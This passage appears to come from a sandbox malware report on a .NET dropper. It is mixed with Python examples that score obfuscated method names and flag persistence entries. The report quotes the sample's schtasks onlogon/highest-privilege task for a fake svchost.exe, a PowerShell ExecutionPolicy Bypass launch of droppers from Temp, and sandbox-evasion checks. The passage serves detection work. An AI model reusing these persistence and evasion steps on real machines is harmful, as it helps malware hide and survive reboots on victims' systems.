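The two Data Obfuscation indicators above, the reflective lookup of Marshal.GetDelegateForFunctionPointer and the high-entropy method names, can be reproduced offline against decompiler output. The Python below is an added example written for this page, not code from Joe Sandbox or from the sample: it scores the method names the report lists for mDdWusHvKjN.cs against a constructed control set of ordinary names, and pulls method declarations and typeof(X).GetMethod("Y") lookups out of a small constructed C# snippet that borrows the kMtwg0o70HMbUjS709M9 class name and the GetMethod line quoted in the report. The thresholds, the interior-capital heuristic, the control names and the snippet are all assumptions of the example.

```python
import math
import re
from collections import Counter

# Method names Joe Sandbox listed for mDdWusHvKjN.cs in the report above.
OBFUSCATED_NAMES = [
    "whNsRutPAVgWYIR", "ZHAJfhfTdMeRATSc", "cXwWRyDzuxp", "fdbUiFSpvRBsW",
    "rbrvcWQMTUecvVGozR", "hwwZLyNLEsam", "pMcNozYWlkyrwJI", "iBXCqebzvyo",
    "UHlfhfOzmiN", "YwrdNNkfdjWXY",
]
# Constructed control set of ordinary .NET method names (not taken from the sample).
BENIGN_NAMES = [
    "Initialize", "Connect", "SendHeartbeat", "ReceiveMessage", "GetConnectionString",
    "ParseResponse", "Dispose", "ToString", "Equals", "GetHashCode",
]

# Assumed cut-offs; calibrate them on your own clean and obfuscated assemblies.
ENTROPY_THRESHOLD = 4.8         # bits per character of the concatenated names
INTERIOR_UPPER_THRESHOLD = 0.3  # share of upper-case letters after a name's first character


def shannon_entropy(text: str) -> float:
    """Bits per character of `text`; the maximum is log2 of the alphabet size."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def interior_uppercase_ratio(names) -> float:
    """PascalCase/camelCase names capitalise few interior letters; random-letter
    names capitalise roughly half of them. This check is the example's own addition."""
    interior = "".join(name[1:] for name in names)
    if not interior:
        return 0.0
    return sum(ch.isupper() for ch in interior) / len(interior)


def assess_names(names) -> dict:
    """Score one class's method names: entropy of the concatenation plus the interior-capital ratio."""
    entropy = shannon_entropy("".join(names))
    upper = interior_uppercase_ratio(names)
    return {
        "entropy": round(entropy, 2),
        "interior_upper": round(upper, 2),
        "suspicious": entropy > ENTROPY_THRESHOLD and upper > INTERIOR_UPPER_THRESHOLD,
    }


# Conservative C# method-declaration matcher: modifiers, return type, name, then "(".
_METHOD_DECL = re.compile(
    r"^\s*(?:(?:public|private|protected|internal|static|virtual|override|sealed|unsafe|async)\s+)+"
    r"[\w<>\[\],.?]+\s+(\w+)\s*\(",
    re.MULTILINE,
)
# typeof(X).GetMethod("Y", ...): the reflective lookup the report flags as dynamic invocation.
_REFLECTIVE_LOOKUP = re.compile(r'typeof\((\w+)\)\s*\.GetMethod\(\s*"(\w+)"')


def extract_method_names(csharp_source: str):
    """Method names declared in decompiled C# text, in source order."""
    return _METHOD_DECL.findall(csharp_source)


def reflective_lookups(csharp_source: str):
    """(type, method) pairs resolved through reflection instead of a direct call."""
    return _REFLECTIVE_LOOKUP.findall(csharp_source)


# Constructed decompiler-style snippet; only the GetMethod line is quoted from the report.
SAMPLE_SOURCE = """
internal class kMtwg0o70HMbUjS709M9
{
    public static void Initialize() { }
    private int GetHashCode2(int x) { return x; }
    internal string whNsRutPAVgWYIR(object o) { return null; }
    private static object Resolve(IntPtr p, Type t)
    {
        var m = typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)});
        return m.Invoke(null, new object[] { p, t });
    }
}
"""

if __name__ == "__main__":
    print("obfuscated:", assess_names(OBFUSCATED_NAMES))
    print("benign:    ", assess_names(BENIGN_NAMES))
    print("methods:   ", extract_method_names(SAMPLE_SOURCE))
    print("reflection:", reflective_lookups(SAMPLE_SOURCE))
```

Joe Sandbox does not publish its cut-off, so set ENTROPY_THRESHOLD from clean assemblies first; classes with only one or two short methods give noisy entropy and are better pooled per assembly than scored alone. The reflective-lookup check is the more robust of the two signals: a legitimate assembly has no reason to fetch GetDelegateForFunctionPointer by name rather than calling it.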

                    Persistence and Installation Behavior

Source: C:\Users\user\Desktop\zrrHgsDzgS.exe | File created: C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\Desktop\zrrHgsDzgS.exe | File created: C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\luglzv.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\udwnme.exe

                    Boot Survival

Source: Yara match | File source: zrrHgsDzgS.exe, type: SAMPLE
Source: Yara match | File source: 0.0.zrrHgsDzgS.exe.660000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.1674883989.0000000000662000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1725732577.0000000002A9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2919350933.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2919350933.000000000352D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: zrrHgsDzgS.exe PID: 6452, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 7060, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: udwnme.exe PID: 4884, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: luglzv.exe PID: 5052, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPED
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'
Source: C:\Users\user\AppData\Roaming\svchost.exe | Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\2F074213E2D3902A2EA2 1A717C40FF7F60C18953B46A69A8FC47CCE7DAD6116CD3715DEB2ABF0D80722D
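The persistence chain recorded above (a copy of the sample dropped as svchost.exe under AppData\Roaming, a highest-run-level logon task pointing at it, and PowerShell launched with ExecutionPolicy Bypass to start the droppers from Temp) is exactly what a process-creation rule should catch. The Python below is an added example, not one of the Sigma rules Joe Sandbox applied: it parses the report's entries, re-spaced as "Source: <process> | <event>: <detail>", plus two constructed benign controls, and applies three checks. The writable-path markers, the system-binary list and the trigger/run-level combination it treats as suspicious are the example's assumptions.

```python
import re

# Locations a standard user can write to; a task action or launch target here is a red flag.
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")
# Where the genuine copies of Windows system binaries live.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
SYSTEM_PROCESS_NAMES = {
    "svchost.exe", "csrss.exe", "lsass.exe", "winlogon.exe", "explorer.exe",
    "dllhost.exe", "conhost.exe", "smss.exe", "services.exe", "wininit.exe",
}

# Report entries re-spaced as "Source: <process> | <event>: <detail>". The first three are the
# findings listed above; the last two are constructed benign controls, not from the report.
SAMPLE_LINES = [
    "Source: C:\\Users\\user\\Desktop\\zrrHgsDzgS.exe | File created: "
    "C:\\Users\\user\\AppData\\Roaming\\svchost.exe",
    "Source: C:\\Windows\\SysWOW64\\cmd.exe | Process created: C:\\Windows\\SysWOW64\\schtasks.exe "
    "schtasks /create /f /sc onlogon /rl highest /tn \"svchost\" "
    "/tr '\"C:\\Users\\user\\AppData\\Roaming\\svchost.exe\"'",
    "Source: C:\\Windows\\SysWOW64\\cmd.exe | Process created: "
    "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe powershell ExecutionPolicy Bypass "
    "Start-Process -FilePath '\"C:\\Users\\user\\AppData\\Local\\Temp\\udwnme.exe\"'",
    "Source: C:\\Windows\\System32\\cmd.exe | Process created: C:\\Windows\\System32\\schtasks.exe "
    "schtasks /create /sc daily /tn \"VendorUpdate\" /tr \"C:\\Program Files\\Vendor\\update.exe\"",
    "Source: C:\\Users\\user\\Desktop\\installer.exe | File created: "
    "C:\\Users\\user\\AppData\\Local\\Temp\\setup.log",
]

_ENTRY = re.compile(
    r"^Source:\s*(?P<source>.*?)\s*\|\s*(?P<event>Process created|File created):\s*(?P<detail>.*)$"
)


def _unquote(arg: str) -> str:
    """Peel the nested '"..."' quoting the report shows around paths."""
    return arg.strip().strip("'\"").strip()


def _user_writable(path: str) -> bool:
    low = path.lower()
    return any(marker in low for marker in USER_WRITABLE_MARKERS)


def check_schtasks(cmd: str):
    """Logon/startup trigger or highest run level with an action in a user-writable path."""
    low = cmd.lower()
    if "schtasks" not in low or "/create" not in low:
        return None
    trigger = re.search(r"/sc\s+(\S+)", cmd, re.I)
    level = re.search(r"/rl\s+(\S+)", cmd, re.I)
    name = re.search(r'/tn\s+("[^"]*"|\S+)', cmd, re.I)
    action = re.search(r"/tr\s+(.+?)\s*$", cmd, re.I)
    if not action:
        return None
    target = _unquote(action.group(1))
    trig = trigger.group(1).lower() if trigger else ""
    lvl = level.group(1).lower() if level else ""
    if _user_writable(target) and (trig in {"onlogon", "onstart"} or lvl == "highest"):
        task = _unquote(name.group(1)) if name else ""
        return {
            "rule": "elevated_logon_task_from_user_path",
            "task": task,
            "path": target,
            "mimics_system_name": task.lower() + ".exe" in SYSTEM_PROCESS_NAMES,
        }
    return None


def check_powershell(cmd: str):
    """PowerShell with the execution policy bypassed, starting a binary from a user-writable path."""
    low = cmd.lower()
    if "powershell" not in low or not re.search(r"-?executionpolicy\s+bypass", low):
        return None
    file_path = re.search(r"-FilePath\s+(.+?)\s*$", cmd, re.I)
    target = _unquote(file_path.group(1)) if file_path else ""
    if "start-process" in low and _user_writable(target):
        return {"rule": "powershell_bypass_start_process", "path": target}
    return None


def check_file_created(path: str):
    """A file named like a core Windows process, created outside System32/SysWOW64."""
    name = path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if name in SYSTEM_PROCESS_NAMES and not path.lower().startswith(SYSTEM_DIRS):
        return {"rule": "system_name_outside_system_dir", "path": path}
    return None


def scan(lines):
    """Apply the three checks to report entries; one finding per hit, in input order."""
    findings = []
    for line in lines:
        entry = _ENTRY.match(line)
        if not entry:
            continue
        detail = entry.group("detail")
        if entry.group("event") == "File created":
            hits = [check_file_created(detail)]
        else:
            hits = [check_schtasks(detail), check_powershell(detail)]
        for hit in hits:
            if hit:
                hit["source"] = entry.group("source")
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LINES):
        print(finding)
```

On a live host the same checks apply to Sysmon Event ID 1 command lines and Event ID 11 file creations. The task rule only sees schtasks.exe; persistence registered through the Register-ScheduledTask cmdlet or the ITaskService COM interface needs a separate rule on Microsoft-Windows-TaskScheduler/Operational event 106, which this parser does not cover.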
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exe; Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost.exe; Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe; Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\netsh.exe; Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe - Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match - File source: zrrHgsDzgS.exe, type: SAMPLE
                    Source: Yara match - File source: 0.0.zrrHgsDzgS.exe.660000.0.unpack, type: UNPACKEDPE
                    Source: Yara match - File source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.unpack, type: UNPACKEDPE
                    Source: Yara match - File source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match - File source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match - File source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPE
                    Source: Yara match - File source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match - File source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match - File source: 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                    Source: Yara match - File source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match - File source: 00000000.00000000.1674883989.0000000000662000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match - File source: 00000000.00000002.1725732577.0000000002A9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match - File source: 00000007.00000002.2919350933.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match - File source: 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match - File source: 00000007.00000002.2919350933.000000000352D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match - File source: Process Memory Space: zrrHgsDzgS.exe PID: 6452, type: MEMORYSTR
                    Source: Yara match - File source: Process Memory Space: svchost.exe PID: 7060, type: MEMORYSTR
                    Source: Yara match - File source: Process Memory Space: udwnme.exe PID: 4884, type: MEMORYSTR
                    Source: Yara match - File source: Process Memory Space: luglzv.exe PID: 5052, type: MEMORYSTR
                    Source: Yara match - File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                    Source: Yara match - File source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPED
                    Source: Yara match - File source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPED
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe - WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: zrrHgsDzgS.exe, udwnme.exe.7.dr, luglzv.exe.7.dr, svchost.exe.0.dr - Binary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exe - Memory allocated: FE0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exe - Memory allocated: 2970000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exe - Memory allocated: 27C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\svchost.exe - Memory allocated: 17F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\svchost.exe - Memory allocated: 32A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\svchost.exe - Memory allocated: 52A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\svchost.exe - Memory allocated: 2D30000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\svchost.exe - Memory allocated: 4D30000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Memory allocated: 1470000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Memory allocated: 3000000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Memory allocated: 2D50000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe - Memory allocated: DC0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe - Memory allocated: 29F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe - Memory allocated: F90000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exe - Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\svchost.exe - Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 599891
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 599782
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 599657
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 599516
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 599391
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 599266
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 599132
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 598986
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 598797
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 598684
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 598578
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 598469
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 598344
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 598233
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 598112
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 597993
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 597875
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 597766
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 597641
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 597530
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 597410
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 597282
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 597172
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 597063
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 596938
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 596813
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 596688
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 596563
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 596437
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 596328
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 596219
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 596110
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 595985
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 595860
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 595735
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 595610
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 595485
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 595360
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 595235
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 595110
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 594985
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 594860
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 594719
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 594610
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 594485
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 594351
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 594235
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 594110
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 593985
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 593860
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe - Thread delayed: delay time: 593735
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 599874
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 599765
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 599656
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 599546
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 599437
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 599325
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 599218
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 599109
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 598999
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 598890
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 598780
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 598671
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 598562
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 598453
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 598343
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 598233
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 598114
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 597984
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 597874
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 597765
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 597655
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 597546
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 595625
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 595515
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 595406
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 595296
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 595187
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 595077
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 594968
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 594859
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 594749
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Window / User API: threadDelayed 1880
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Window / User API: threadDelayed 7972
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3319
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1052
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Window / User API: threadDelayed 7189
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Window / User API: threadDelayed 2617
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3237
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 915
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Window / User API: threadDelayed 4086
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Window / User API: threadDelayed 5748
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exe TID: 6492 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 6644 | Thread sleep time: -6456360425798339s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2352 | Thread sleep count: 1880 > 30
                    Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2352 | Thread sleep count: 7972 > 30
                    Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 5808 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3760 | Thread sleep count: 3319 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2708 | Thread sleep count: 1052 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1772 | Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2676 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -35048813740048126s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -600000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -599891s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -599782s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -599657s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -599516s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -599391s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -599266s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -599132s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -598986s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -598797s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -598684s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -598578s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -598469s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -598344s >= -30000s
